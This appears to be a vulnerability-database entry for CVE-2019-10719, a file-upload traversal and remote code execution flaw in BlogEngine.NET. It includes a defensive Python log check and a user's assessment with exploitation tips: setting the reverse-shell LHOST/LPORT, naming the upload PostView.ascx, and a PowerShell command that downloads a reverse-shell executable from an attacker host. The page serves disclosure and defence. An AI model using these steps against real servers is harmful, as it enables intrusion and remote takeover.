Attacker Value: Unknown (1 user assessed)
Exploitability: Unknown (1 user assessed)
User Interaction: Unknown
Privileges Required: Unknown
Attack Vector: Unknown

CVE-2019-10719

Disclosure Date: June 21, 2019
MITRE ATT&CK tactics:

  • Execution (Validation: Validated)
  • Initial Access (Validation: Validated)

Description

BlogEngine.NET 3.3.7.0 and earlier allows Directory Traversal and Remote Code Execution because file creation is mishandled, related to /api/upload and BlogEngine.NET/AppCode/Api/UploadController.cs. NOTE: this issue exists because of an incomplete fix for CVE-2019-6714.
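
A log check for the endpoint named in the description, added here as an example (not code from this page or from BlogEngine.NET): it flags requests to /api/upload whose query string decodes to a `..` path segment. The log excerpt and the parameter name `p` are constructed, and it assumes the path is supplied in the query string, which the page does not state; values sent in a request body do not appear in IIS logs.

```python
import re
from urllib.parse import unquote

# Constructed IIS W3C log excerpt (not from the page). The query parameter
# name "p" is a placeholder, not the application's real parameter.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2019-06-22 10:01:02 POST /api/upload action=file 192.0.2.10 200
2019-06-22 10:03:40 POST /api/upload action=file&p=..%2f..%2fx 198.51.100.7 200
2019-06-22 10:03:41 POST /api/upload action=file&p=%252e%252e%255cx 198.51.100.7 200
2019-06-22 10:04:00 GET /post/hello p=..%2f 192.0.2.10 200
2019-06-22 10:05:00 POST /blog/API/Upload p=a/../b 203.0.113.5 201
"""

# ".." standing alone as a path segment, with "/" or "\" as separator.
TRAVERSAL = re.compile(r"(^|[=&/\\])\.\.([/\\&]|$)")


def fully_decode(value, max_rounds=5):
    """URL-decode repeatedly so double-encoded sequences (%252e) are seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_upload_traversal(log_text):
    """Return log rows for /api/upload requests with a '..' query segment."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows below
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # IIS paths are case-insensitive; the app may sit under a sub-path.
        stem = row.get("cs-uri-stem", "").lower().rstrip("/")
        if not stem.endswith("/api/upload"):
            continue
        if TRAVERSAL.search(fully_decode(row.get("cs-uri-query", ""))):
            hits.append(row)
    return hits


if __name__ == "__main__":
    for hit in find_upload_traversal(SAMPLE_LOG):
        print(hit["date"], hit["time"], hit["c-ip"], hit["cs-uri-query"])
```

A hit is a lead to follow up by checking the site directory for unexpected files, such as the PostView.ascx named in the assessment below.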

Technical Analysis

This attack was extremely easy to use. My jaw almost hit the ground at the ease. My only worry is that this will be a very hard attack to find in the wild as it depends on specific versions of the software to work.

Things to keep in mind:
- You will need to change your IP address and port inside the script. Near the beginning of the script, there is a line for System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("$LHOST", $LPORT). Set the host and port accordingly.
- I have had several instances where I would need to restart the BlogEngine server or the reverse shell would hang up in some terminal windows but not others; this exploit creates a very unstable shell.
- The script should be named PostView.ascx.

Moving from here:
- It is recommended to upgrade to a different shell as soon as possible.
- I have had the most luck with Meterpreter: creating a reverse shell with msfvenom and then uploading it to the BlogEngine server with PowerShell -> powershell Invoke-WebRequest -Uri http://10.10.10.10:8888/reverse.exe -Outfile reverse.exe

CVSS V3 Severity and Metrics
Base Score: None
Impact Score: Unknown
Exploitability Score: Unknown
Vector: Unknown
Attack Vector (AV): Unknown
Attack Complexity (AC): Unknown
Privileges Required (PR): Unknown
User Interaction (UI): Unknown
Scope (S): Unknown
Confidentiality (C): Unknown
Integrity (I): Unknown
Availability (A): Unknown

General Information

Vendors

  • dotnetblogengine

Products

  • blogengine.net